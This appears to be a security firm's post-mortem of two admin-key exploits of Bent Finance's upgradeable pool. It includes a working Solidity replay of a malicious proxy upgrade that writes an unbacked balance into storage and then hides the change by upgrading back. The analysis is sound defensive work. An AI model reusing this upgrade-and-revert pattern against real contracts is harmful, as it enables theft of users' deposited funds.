Fairyproof’s Brief Analysis of Attack on Bent Finance
Bent Finance, a staking and farming platform to enhance users’ curve returns was exploited twice within ten days.
In the two attacks, the attacker took 263,000 cvxCRV tokens in the first and 250,000 cvxCRV tokens in the second. The stolen LP tokens were worth around 3 million USD in total.
The first exploit happened at 08:38:53 PM UTC on Dec 12, 2021. The transaction can be checked at:
https://etherscan.io/tx/0x0b2ce2f3822e09ca280d22e969d41b08e0df3ccfc75db08287e0e0c091dd6d50
The second happened at 02:43:53 AM UTC on Dec 21, 2021. The transaction can be checked at:
https://etherscan.io/tx/0x4010b3b64336dc0a340a69010008f7b3fa3842466b2641a6961d888a771f5468
The attacked contract was the BentBasePool contract deployed at 0x270B6AFF561284ef380cDD6d8B036f4981049A86 on Ethereum. This contract is an upgradeable proxy: its admin can replace the implementation contract that the proxy delegates calls to. After each upgrade, an “updateVersion” function on the new implementation is called to finish the upgrade. Because the implementation runs in the proxy’s storage context, whatever updateVersion writes ends up in the proxy’s own state.
The root cause of both attacks was that the admin’s private key was compromised. No vulnerability in the pool logic itself was needed: the admin role alone was enough.
The whole process:
Using the compromised admin key, the attacker upgraded the proxy’s implementation to a malicious contract and then called its updateVersion function. Instead of finishing an upgrade, the malicious updateVersion wrote directly to the pool’s balance storage and set the balance of the attacker’s address to an inflated amount.
The attacker then upgraded the implementation back to a normal contract and called updateVersion again, so that the proxy looked like it had gone through an ordinary upgrade. The inflated balance persisted in the proxy’s storage, and the attacker withdrew cvxCRV against it.
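As an added illustration (this is not Bent’s code; it is a hypothetical minimal proxy and pool with made-up addresses and amounts), the following Solidity shows why the two upgrade-and-updateVersion steps are enough. The malicious implementation keeps the same storage layout as the legitimate one, so the balance it writes from updateVersion lands in the proxy’s storage and survives the upgrade back to the honest logic.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Hypothetical minimal upgradeable proxy (not the BentBasePool contract).
// Implementation and admin addresses live in EIP-1967 slots so they cannot
// collide with the implementation's own state variables.
contract MinimalProxy {
    bytes32 private constant IMPL_SLOT =
        bytes32(uint256(keccak256("eip1967.proxy.implementation")) - 1);
    bytes32 private constant ADMIN_SLOT =
        bytes32(uint256(keccak256("eip1967.proxy.admin")) - 1);

    event Upgraded(address indexed implementation);

    constructor(address impl) {
        _store(ADMIN_SLOT, msg.sender);
        _store(IMPL_SLOT, impl);
    }

    // One key, no timelock: whoever holds the admin key owns all user funds.
    function upgradeTo(address newImpl) external {
        require(msg.sender == _load(ADMIN_SLOT), "not admin");
        _store(IMPL_SLOT, newImpl);
        emit Upgraded(newImpl);
    }

    function _store(bytes32 slot, address value) private {
        assembly { sstore(slot, value) }
    }

    function _load(bytes32 slot) private view returns (address value) {
        assembly { value := sload(slot) }
    }

    // Every other call is delegatecalled into the implementation, which
    // therefore reads and writes the proxy's storage, not its own.
    fallback() external payable {
        address impl = _load(IMPL_SLOT);
        assembly {
            calldatacopy(0, 0, calldatasize())
            let ok := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)
            returndatacopy(0, 0, returndatasize())
            switch ok
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }
}

// Legitimate pool logic. Storage layout: slot 0 = version, slot 1 = balances.
contract BasePool {
    uint256 public version;
    mapping(address => uint256) public balances;

    function deposit(uint256 amount) external { balances[msg.sender] += amount; }
    function updateVersion() external { version += 1; }
}

// Attacker's implementation with the SAME layout. Writing `balances` here
// writes the proxy's real balance mapping. The immutables live in code, not
// storage, so they add no slot and do not disturb the layout.
contract MaliciousPool {
    uint256 public version;
    mapping(address => uint256) public balances;
    address private immutable attacker;
    uint256 private immutable amount;

    constructor(address attacker_, uint256 amount_) {
        attacker = attacker_;
        amount = amount_;
    }

    // Same selector as the honest updateVersion(), but it mints a balance.
    function updateVersion() external { balances[attacker] = amount; }
}

// Replays the steps from the writeup against a fresh proxy. This contract
// deploys the proxy, so it holds the admin role (the compromised key).
contract Replay {
    function run() external returns (uint256 beforeAttack, uint256 afterAttack) {
        address attacker = address(0xBEEF);        // hypothetical address
        BasePool legit = new BasePool();
        MinimalProxy proxy = new MinimalProxy(address(legit));
        BasePool pool = BasePool(address(proxy));   // proxy seen through the pool ABI

        beforeAttack = pool.balances(attacker);     // 0: nothing deposited

        // Step 1: upgrade to the malicious logic and "finish the upgrade".
        MaliciousPool evil = new MaliciousPool(attacker, 250_000 ether);
        proxy.upgradeTo(address(evil));
        pool.updateVersion();                       // writes balances[attacker]

        // Step 2: upgrade back to honest logic and call updateVersion again.
        proxy.upgradeTo(address(legit));
        pool.updateVersion();                       // version += 1, looks routine

        afterAttack = pool.balances(attacker);      // 250_000 ether, never deposited
    }
}
```

Compile with solc 0.8.x and call Replay.run() in Remix or a Foundry test: beforeAttack is 0 and afterAttack is 250,000 ether although no deposit ever happened, and the final implementation address is the honest one. The weakness is not in BasePool but in a single admin key that can call upgradeTo immediately. A timelock or multisig on upgrades, plus an alert on the Upgraded event (two upgrades minutes apart is a strong signal), is the control that would have given users and the team time to react.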